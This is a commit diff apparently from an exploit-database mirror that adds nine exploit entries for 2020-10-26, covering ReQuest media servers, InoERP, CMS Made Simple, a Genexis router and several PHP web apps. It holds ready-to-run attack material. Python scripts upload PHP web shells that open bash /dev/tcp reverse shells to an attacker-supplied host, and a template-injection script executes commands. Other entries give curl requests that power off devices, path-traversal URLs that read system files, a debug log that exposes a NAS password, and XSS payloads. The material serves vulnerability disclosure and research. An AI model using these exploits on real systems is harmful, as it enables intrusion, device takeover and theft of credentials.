DB: 2020-10-27
9 changes to exploits/shellcodes CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored) InoERP 0.7.2 - Remote Code Execution (Unauthenticated) PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS) Genexis Platinum-4410 - 'SSID' Persistent XSS ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
This commit is contained in:
parent
99b2cc4c13
commit
7ce71393bb
10 changed files with 577 additions and 0 deletions
22
exploits/hardware/webapps/48948.txt
Normal file
22
exploits/hardware/webapps/48948.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: Persistent XSS in SSID
|
||||
# Date: 10/24/2020
|
||||
# Exploit Author: Amal Mohandas
|
||||
# Vendor Homepage: https://genexis.co.in/product/ont/
|
||||
# Version: Platinum-4410 Software version - P4410-V2-1.28
|
||||
# Tested on: Windows 10
|
||||
|
||||
Vulnerability Details
|
||||
======================
|
||||
Genexis Platinum-4410 Home Gateway Router is vulnerable to stored XSS
|
||||
in the SSID parameter. This could allow attackers to perform malicious
|
||||
action in which the XSS popup will affect all privileged users.
|
||||
|
||||
How to reproduce
|
||||
===================
|
||||
1. Login to the firmware as any user
|
||||
2. Navigate to Net tab--> WLAN
|
||||
3. Enter below mentioned payload in "SSID" text box
|
||||
<script>alert(1)</script>
|
||||
4. Click on the "OK" button.
|
||||
5. Relogin as any user and again navigate to Net tab--> WLAN
|
||||
6. Observe the XSS popup showing persistent XSS
|
94
exploits/hardware/webapps/48949.txt
Normal file
94
exploits/hardware/webapps/48949.txt
Normal file
|
@ -0,0 +1,94 @@
|
|||
# Exploit Title: ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure Vulnerability
|
||||
# Exploit Author: LiquidWorm
|
||||
# Software Link: http://request.com/
|
||||
# Version: 3.0.0
|
||||
|
||||
ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability
|
||||
|
||||
|
||||
Vendor: ReQuest Serious Play LLC
|
||||
Product web page: http://www.request.com
|
||||
Affected version: 3.0.0
|
||||
2.1.0.831
|
||||
1.5.2.822
|
||||
1.5.2.821
|
||||
1.5.1.820
|
||||
|
||||
Summary: With the MediaPlayer, ReQuest delivers video content and award-winning
|
||||
distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an
|
||||
approved NAS) can be connected through your home network to your ReQuest system,
|
||||
delivering HD video to your television in 1080p via HDMI outputs.
|
||||
|
||||
Desc: The device suffers from an unauthenticated file disclosure vulnerability
|
||||
when input passed through the 'file' parameter in tail.html and file.html script
|
||||
is not properly verified before being used to read web log files. This can be
|
||||
exploited to disclose contents of files from local resources.
|
||||
|
||||
===============================================================================
|
||||
/tail.html:
|
||||
-----------
|
||||
|
||||
function load_data()
|
||||
{
|
||||
|
||||
var elem = $("#data");
|
||||
$.ajax({url:"tail.html",
|
||||
data:{
|
||||
file:elem.attr("file"),
|
||||
start:elem.attr("nextstart"),
|
||||
tail:elem.attr("tail")?elem.attr("tail"):undefined,
|
||||
max:elem.attr("max")?elem.attr("max"):undefined},
|
||||
cache:false,
|
||||
async:true,
|
||||
success:show_data}
|
||||
);
|
||||
}
|
||||
|
||||
function main_start()
|
||||
{
|
||||
|
||||
$("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"});
|
||||
window.setTimeout(load_data, 1);
|
||||
}
|
||||
|
||||
function show_data(data, status, jqxhr)
|
||||
{
|
||||
var data = $("filedata", data);
|
||||
var newdata = data.attr("data");
|
||||
var start = data.attr("start");
|
||||
var nextstart = data.attr("nextstart");
|
||||
var elem = $("#data");
|
||||
var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20);
|
||||
elem.attr({tail:"", start:start, nextstart:nextstart});
|
||||
if (newdata.length)
|
||||
elem.append(htmlspecialchars(newdata));
|
||||
var delay = parseFloat(elem.attr("update"))*1000;
|
||||
if (isNaN(delay))
|
||||
delay = 5000;
|
||||
if (at_end)
|
||||
$("html,body").scrollTop($(document).height());
|
||||
window.setTimeout(load_data, delay);
|
||||
}
|
||||
|
||||
$(document).ready(main_start);
|
||||
|
||||
===============================================================================
|
||||
|
||||
Tested on: ReQuestHTTP/0.1 httpserver/0.1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5599
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php
|
||||
|
||||
|
||||
01.08.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py
|
||||
http://192.168.1.17:8001/file.html?file=C:\windows\win.ini
|
76
exploits/hardware/webapps/48950.txt
Normal file
76
exploits/hardware/webapps/48950.txt
Normal file
|
@ -0,0 +1,76 @@
|
|||
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure
|
||||
# Exploit Author: LiquidWorm
|
||||
# Software Link: http://request.com/
|
||||
# Version: 3.0.0
|
||||
|
||||
ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure
|
||||
|
||||
|
||||
Vendor: ReQuest Serious Play LLC
|
||||
Product web page: http://www.request.com
|
||||
Affected version: 7.0.3.4968 (Pro)
|
||||
7.0.2.4954
|
||||
6.5.2.4954
|
||||
6.4.2.4681
|
||||
6.3.2.4203
|
||||
2.0.1.823
|
||||
|
||||
Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
|
||||
into a compact powerhouse. With the ability to add unlimited NAS devices, the
|
||||
F3 can handle your entire family's media collection with ease.
|
||||
|
||||
Desc: The unprotected web management server is vulnerable to sensitive information
|
||||
disclosure vulnerability. An unauthenticated attacker can visit the message_log
|
||||
page and disclose the webserver's Python debug log file containing system information,
|
||||
credentials, paths, processes and command arguments running on the device.
|
||||
|
||||
Tested on: ReQuest Serious Play® OS v7.0.1
|
||||
ReQuest Serious Play® OS v6.0.0
|
||||
Debian GNU/Linux 5.0
|
||||
Linux 3.2.0-4-686-pae
|
||||
Linux 2.6.36-request+lenny.5
|
||||
Apache/2.2.22
|
||||
Apache/2.2.9
|
||||
PHP/5.4.45
|
||||
PHP/5.2.6-1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
Macedonian Information Security Research and Development Laboratory
|
||||
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5600
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php
|
||||
|
||||
|
||||
01.08.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ curl http://192.168.1.17/message_log
|
||||
|
||||
...
|
||||
...
|
||||
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1590039696]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
|
||||
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1581646992]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000002/.request/upload
|
||||
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1403303056]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000003/.request/upload
|
||||
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1610613904]: (mediaman.py/11576) Message Response (mrespgetdir): /fat32/c/upload
|
||||
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1619006608]: (mediaman.py/11576) Message Response (mrespgetdir): Failed - no such directory
|
||||
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1285805200]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
|
||||
Oct 14 09:17:36 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
|
||||
Oct 14 09:17:48 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
|
||||
Oct 14 09:19:19 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
|
||||
Oct 14 09:19:32 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.397037 ('Update News Feed'): /home/arq/bin/widget/news_feed.py
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.401558 ('Update Stock Feed'): /home/arq/bin/widget/stock_feed.py
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/181) Skipping a command ('Check if squeezeplay was properly started'); condition doesn't match
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.408094 ('Probe for CP2101'): /home/arq/bin/cp2101_probe.sh
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.409664 ('Update Weather Feed'): /home/arq/bin/widget/weather_feed.py
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.413391 ('Check for Network Configuration changes'): /home/arq/bin/check_netconf.sh
|
||||
Oct 14 09:20:25 [warning] BrowserProtocolClient_15[pid 11532, tid -1544549520]: (pandoralist.py/282) No Pandora user configured.
|
||||
Oct 14 09:20:35 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681635.425757 ('Ask all currently-attached IMCs to answer a rollcall'): /home/arq/bin/imcRollcall.sh
|
||||
Oct 14 09:20:35 [debug] ini[pid 12089, tid -1251767440]: (iniengine.py/621) Setting MPP30345_STATUS:Rollcall to 1602681635.45
|
||||
...
|
||||
...
|
50
exploits/hardware/webapps/48951.txt
Normal file
50
exploits/hardware/webapps/48951.txt
Normal file
|
@ -0,0 +1,50 @@
|
|||
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service
|
||||
# Exploit Author: LiquidWorm
|
||||
# Software Link: http://request.com/
|
||||
# Version: 3.0.0
|
||||
|
||||
|
||||
|
||||
Vendor: ReQuest Serious Play LLC
|
||||
Product web page: http://www.request.com
|
||||
Affected version: 7.0.3.4968 (Pro)
|
||||
7.0.2.4954
|
||||
6.5.2.4954
|
||||
6.4.2.4681
|
||||
6.3.2.4203
|
||||
2.0.1.823
|
||||
|
||||
Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
|
||||
into a compact powerhouse. With the ability to add unlimited NAS devices, the
|
||||
F3 can handle your entire family's media collection with ease.
|
||||
|
||||
Desc: The device can be shutdown or rebooted by an unauthenticated attacker
|
||||
when issuing one HTTP GET request.
|
||||
|
||||
Tested on: ReQuest Serious Play® OS v7.0.1
|
||||
ReQuest Serious Play® OS v6.0.0
|
||||
Debian GNU/Linux 5.0
|
||||
Linux 3.2.0-4-686-pae
|
||||
Linux 2.6.36-request+lenny.5
|
||||
Apache/2.2.22
|
||||
Apache/2.2.9
|
||||
PHP/5.4.45
|
||||
PHP/5.2.6-1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
Macedonian Information Security Research and Development Laboratory
|
||||
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5601
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php
|
||||
|
||||
|
||||
01.08.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
|
||||
$ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot
|
193
exploits/hardware/webapps/48952.txt
Normal file
193
exploits/hardware/webapps/48952.txt
Normal file
|
@ -0,0 +1,193 @@
|
|||
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
|
||||
# Exploit Author: LiquidWorm
|
||||
# Software Link: http://request.com/
|
||||
# Version: 3.0.0
|
||||
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
#
|
||||
#
|
||||
# ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution
|
||||
#
|
||||
#
|
||||
# Vendor: ReQuest Serious Play LLC
|
||||
# Product web page: http://www.request.com
|
||||
# Affected version: 7.0.3.4968 (Pro)
|
||||
# 7.0.2.4954
|
||||
# 6.5.2.4954
|
||||
# 6.4.2.4681
|
||||
# 6.3.2.4203
|
||||
# 2.0.1.823
|
||||
#
|
||||
# Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
|
||||
# into a compact powerhouse. With the ability to add unlimited NAS devices, the
|
||||
# F3 can handle your entire family's media collection with ease.
|
||||
#
|
||||
# Desc: The ReQuest ARQ F3 web server suffers from an unauthenticated remote
|
||||
# code execution vulnerability. Abusing the hidden ReQuest Internal Utilities
|
||||
# page (/tools) from the services provided, an attacker can exploit the Quick
|
||||
# File Uploader (/tools/upload.html) page and upload PHP executable files that
|
||||
# results in remote code execution as the web server user.
|
||||
#
|
||||
# =============================================================================
|
||||
# lqwrm@metalgear:~/prive$ python3 ReQuest.py 192.168.1.17:3664 192.168.1.22 6161
|
||||
# Let's see waddup...
|
||||
# Good to go.
|
||||
# Starting handler on port 6161.
|
||||
# Writing callback file...
|
||||
# We got the dir: /75302IV29ZS1
|
||||
# Checking write status...
|
||||
# All is well John Spartan. Calling your listener...
|
||||
# Connection from 192.168.0.17:42057
|
||||
# You got shell.
|
||||
# id;uname -ro
|
||||
# uid=81(apache) gid=81(apache) groups=81(apache),666(arq)
|
||||
# 3.2.0-4-686-pae GNU/Linux
|
||||
# exit
|
||||
# *** Connection closed by remote host ***
|
||||
# lqwrm@metalgear:~/prive$
|
||||
# =============================================================================
|
||||
#
|
||||
# Tested on: ReQuest Serious Play® OS v7.0.1
|
||||
# ReQuest Serious Play® OS v6.0.0
|
||||
# Debian GNU/Linux 5.0
|
||||
# Linux 3.2.0-4-686-pae
|
||||
# Linux 2.6.36-request+lenny.5
|
||||
# Apache/2.2.22
|
||||
# Apache/2.2.9
|
||||
# PHP/5.4.45
|
||||
# PHP/5.2.6-1
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# Macedonian Information Security Research and Development Laboratory
|
||||
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2020-5602
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php
|
||||
#
|
||||
#
|
||||
# 01.08.2020
|
||||
#
|
||||
|
||||
from time import sleep
|
||||
import threading######
|
||||
import telnetlib######
|
||||
import requests#######
|
||||
import socket#########
|
||||
import sys############
|
||||
import re#############
|
||||
|
||||
class Manhattan:
|
||||
|
||||
def __init__(self):
|
||||
self.secretagent = "Mushu"
|
||||
self.payload = None
|
||||
self.deploy = None
|
||||
self.rhost = None
|
||||
self.lhost = None
|
||||
self.lport = None
|
||||
|
||||
def the_args(self):
|
||||
if len(sys.argv) != 4:
|
||||
self.the_usage()
|
||||
else:
|
||||
self.rhost = sys.argv[1]
|
||||
self.lhost = sys.argv[2]
|
||||
self.lport = int(sys.argv[3])
|
||||
if not "http" in self.rhost:
|
||||
self.rhost = "http://{}".format(self.rhost)
|
||||
|
||||
def the_usage(self):
|
||||
self.the_wha()
|
||||
print("Usage: python3 {} [targetIP:targetPORT] [localIP] [localPORT]".format(sys.argv[0]))
|
||||
print("Example: python3 {} 192.168.0.91:3664 192.168.0.22 6161\n".format(sys.argv[0]))
|
||||
exit(0)
|
||||
|
||||
def the_wha(self):
|
||||
titl = "ReQuest Serious Play F3 Media Server RCE"
|
||||
print(titl)
|
||||
|
||||
def the_check(self):
|
||||
print("Let's see waddup...")
|
||||
try:
|
||||
r = requests.get(self.rhost + "/MP3/")
|
||||
if "000000000000" in r.text:
|
||||
print("Good to go.")
|
||||
else:
|
||||
print("Something's fishy.")
|
||||
exit(-16)
|
||||
except Exception as e:
|
||||
print("Hmmm {msg}".format(msg=e))
|
||||
exit(-1)
|
||||
|
||||
def the_upload(self):
|
||||
print("Writing callback file...")
|
||||
self.headers = {"Cache-Control" : "max-age=0",
|
||||
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarylGyylNPXG5WMGCqP",
|
||||
"User-Agent": self.secretagent,
|
||||
"Accept" : "*/*",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"}
|
||||
|
||||
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/" + self.lhost+ "/" +str(self.lport) + " <&1;rm bd0.php'\");"
|
||||
|
||||
self.deploy = "------WebKitFormBoundarylGyylNPXG5WMGCqP\r\n"########
|
||||
self.deploy += "Content-Disposition: form-data; name=\"uploa" #
|
||||
self.deploy += "dedfile\"; filename=\"bd0.php\"\r\nContent-T" #
|
||||
self.deploy += "ype: application/octet-stream\r\n\r\n" + self.payload
|
||||
self.deploy += "\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP\r\nConte"
|
||||
self.deploy += "nt-Disposition: form-data; name=\"location\"\r\n\r\nm"
|
||||
self.deploy += "p3\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP--\r\n"
|
||||
|
||||
requests.post(self.rhost+"/shared/upload.php", headers=self.headers, data=self.deploy)
|
||||
sleep(1)
|
||||
r = requests.get(self.rhost + "/MP3/")
|
||||
regex = re.findall(r'a\shref=\"(.*)\/\">', r.text)[2]
|
||||
print("We got the dir: /" + regex)
|
||||
print("Checking write status...")
|
||||
r = requests.get(self.rhost + "/MP3/" + regex)
|
||||
if "bd0" in r.text:
|
||||
print("All is well John Spartan. Calling your listener...")
|
||||
else:
|
||||
print("Something...isn't right.")
|
||||
exit(-16)
|
||||
requests.get(self.rhost + "/MP3/"+ regex + "/bd0.php")
|
||||
|
||||
def the_subp(self):
|
||||
konac = threading.Thread(name="ZSL", target=self.the_ear)
|
||||
konac.start()
|
||||
sleep(1)
|
||||
self.the_upload()
|
||||
|
||||
def the_ear(self):
|
||||
telnetus = telnetlib.Telnet()
|
||||
print("Starting handler on port {}.".format(self.lport))
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.bind(("0.0.0.0", self.lport))
|
||||
while True:
|
||||
try:
|
||||
s.settimeout(7)
|
||||
s.listen(1)
|
||||
conn, addr = s.accept()
|
||||
print("Connection from {}:{}".format(addr[0], addr[1]))
|
||||
telnetus.sock = conn
|
||||
except socket.timeout as p:
|
||||
print("Hmmm ({msg})".format(msg=p))
|
||||
s.close()
|
||||
exit(0)
|
||||
break
|
||||
|
||||
print("You got shell.")
|
||||
telnetus.interact()
|
||||
conn.close()
|
||||
|
||||
def main(self):
|
||||
self.the_args()
|
||||
self.the_check()
|
||||
self.the_subp()
|
||||
|
||||
if __name__ == '__main__':
|
||||
Manhattan().main()
|
55
exploits/php/webapps/48944.py
Executable file
55
exploits/php/webapps/48944.py
Executable file
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11/10/2017
|
||||
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
|
||||
# Vendor Homepage: http://www.cmsmadesimple.org/
|
||||
# Software Link: N/A
|
||||
# Version: 2.1.6
|
||||
# Tested on: Linux
|
||||
# CVE : CVE-2017-16783
|
||||
# POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/
|
||||
|
||||
PFA
|
||||
-------
|
||||
Gurkirat Singh
|
||||
(tbhaxor <https://google.com/search?q=tbhaxor>)
|
||||
|
||||
from argparse import ArgumentParser, RawTextHelpFormatter
|
||||
from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus
|
||||
import requests as http
|
||||
import re
|
||||
from bs4 import BeautifulSoup, Tag
|
||||
from huepy import *
|
||||
parser = ArgumentParser(description="Exploit for CVE-2017-16783",
|
||||
formatter_class=RawTextHelpFormatter)
|
||||
parser.add_argument(
|
||||
"--target",
|
||||
"-t",
|
||||
help="complete remote target with protocol, host, path and query",
|
||||
required=True,
|
||||
dest="t")
|
||||
parser.add_argument("--command",
|
||||
"-c",
|
||||
help="command to execute (default: whoami)",
|
||||
default="whoami",
|
||||
dest="c")
|
||||
args = parser.parse_args()
|
||||
|
||||
print(info("Building malicious url"))
|
||||
url = urlparse(args.t)
|
||||
query = parse_qs(url.query)
|
||||
query["cntnt01detailtemplate"] = [
|
||||
"string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c
|
||||
]
|
||||
query = {k: ",".join(v) for k, v in query.items()}
|
||||
query = unquote_plus(urlencode(query, doseq=False))
|
||||
_url = url.scheme + "://" + url.netloc + url.path + "?" + query
|
||||
print(good("Done"))
|
||||
print(info("Executing payload"))
|
||||
r = http.get(_url)
|
||||
html = BeautifulSoup(r.content.decode(), "html5lib")
|
||||
main: Tag = html.find("article", {"id": "main"})
|
||||
main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip()
|
||||
print(good("Done"))
|
||||
print(info("Result"))
|
||||
print(main)
|
19
exploits/php/webapps/48945.txt
Normal file
19
exploits/php/webapps/48945.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)
|
||||
# Google Dork: N/A
|
||||
# Date: 2020/10/24
|
||||
# Exploit Author: Akıner Kısa
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/healthcare_0.zip
|
||||
# Version: 1.0
|
||||
# Tested on: XAMPP
|
||||
# CVE : N/A
|
||||
|
||||
Vulnerable Pages:
|
||||
http://localhost/healthcare/Users/registration.php
|
||||
http://localhost/healthcare/Doctor/doctor_registration.php
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
1 - Go to vulnerable pages and fill the "First Name" and "Last Name" blanks with <script>alert(1)</script> payload.
|
||||
|
||||
2 - And check user/doctor account on admin panel or http://localhost/healthcare/admin/user_detail.php?id=<userid> adres.
|
28
exploits/php/webapps/48946.py
Executable file
28
exploits/php/webapps/48946.py
Executable file
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: UTF-8 -*-
|
||||
|
||||
# Exploit Title: InoERP 0.7.2 Unauthenticated Remote Code Execution
|
||||
# Date: March 14, 2020
|
||||
# Exploit Author: Lyhin's Lab
|
||||
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/03/14/inoerp-ab-rce/
|
||||
# Software Link: https://github.com/inoerp/inoERP
|
||||
# Version: 0.7.2
|
||||
# Tested on: Ubuntu 19
|
||||
|
||||
import requests
|
||||
import os
|
||||
import sys
|
||||
|
||||
if len (sys.argv) != 4:
|
||||
print ("specify params in format: python inoerp.py target_url attacker_ip listening_port")
|
||||
else:
|
||||
target_url = sys.argv[1]
|
||||
attacker_ip = sys.argv[2]
|
||||
listening_port = sys.argv[3]
|
||||
target_url += "/modules/sys/form_personalization/json_fp.php"
|
||||
target_headers = {"Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest"}
|
||||
code = "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'\");".format(attacker_ip, listening_port)
|
||||
expl_data = {"get_fp_from_form": "true", "template_code": code, "obj_class_name": ''}
|
||||
|
||||
requests.post(target_url, headers=target_headers, data=expl_data)
|
||||
print ("Check your listener.")
|
31
exploits/php/webapps/48947.txt
Normal file
31
exploits/php/webapps/48947.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: PDW File Browser <= v1.3 - Cross-Site Scripting (XSS)
|
||||
# Date: 24-10-2020
|
||||
# Exploit Author: David Bimmel
|
||||
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
|
||||
# Vendor Homepage: n/a
|
||||
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
|
||||
# Version: <=1.3
|
||||
|
||||
The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a stored and Reflected XSS vulnerability which results in code execution within the browser of an authenticated user. This vulnerability can be exploited when an authenticated user visits the crafted URL (i.e. when phished or when visiting a website containing the URL).
|
||||
|
||||
Stored XSS:
|
||||
The stored XSS is a result of insufficient input sanitization within the 'rename' functionality within the PDW file browser.
|
||||
Below I have provided an example request were the filename (FILE.txt) is replaced with an XSS payload (<svg onload=alert(document.cookies)>). The payload gets executed when any authenticated user navigates to the PDW File browser page.
|
||||
|
||||
POST /ckeditor/plugins/pdw_file_browser/actions.php
|
||||
HTTP/1.1 Host: <HOSTNAME>
|
||||
[…]
|
||||
action=rename&new_filename=<svg+onload=alert(document.cookie
|
||||
s)>&old_filename=script%253EFILE.txt&folder=%252Fmedia%252F&typ
|
||||
e=file
|
||||
|
||||
Reflected XSS:
|
||||
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
|
||||
|
||||
https://<HOSTNAME>/ckeditor/plugins/pdw_file_browser/file_spe
|
||||
cs.php?ajax=true&path=%3Csvg+onload=alert(document.cookies)%
|
||||
3E&type=file
|
||||
|
||||
|
||||
|
||||
Happy Hacking :^)
|
|
@ -40762,6 +40762,15 @@ id,file,description,date,author,type,platform,port
|
|||
48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,
|
||||
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,
|
||||
48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
|
||||
48944,exploits/php/webapps/48944.py,"CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection",2020-10-26,"Gurkirat Singh",webapps,php,
|
||||
48945,exploits/php/webapps/48945.txt,"Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-26,"Akıner Kısa",webapps,php,
|
||||
48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Simon Lyhin",webapps,php,
|
||||
48947,exploits/php/webapps/48947.txt,"PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)",2020-10-26,"David Bimmel",webapps,php,
|
||||
48948,exploits/hardware/webapps/48948.txt,"Genexis Platinum-4410 - 'SSID' Persistent XSS",2020-10-26,"Amal Mohandas",webapps,hardware,
|
||||
48949,exploits/hardware/webapps/48949.txt,"ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
|
||||
48950,exploits/hardware/webapps/48950.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
|
||||
48951,exploits/hardware/webapps/48951.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service",2020-10-26,LiquidWorm,webapps,hardware,
|
||||
48952,exploits/hardware/webapps/48952.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)",2020-10-26,LiquidWorm,webapps,hardware,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue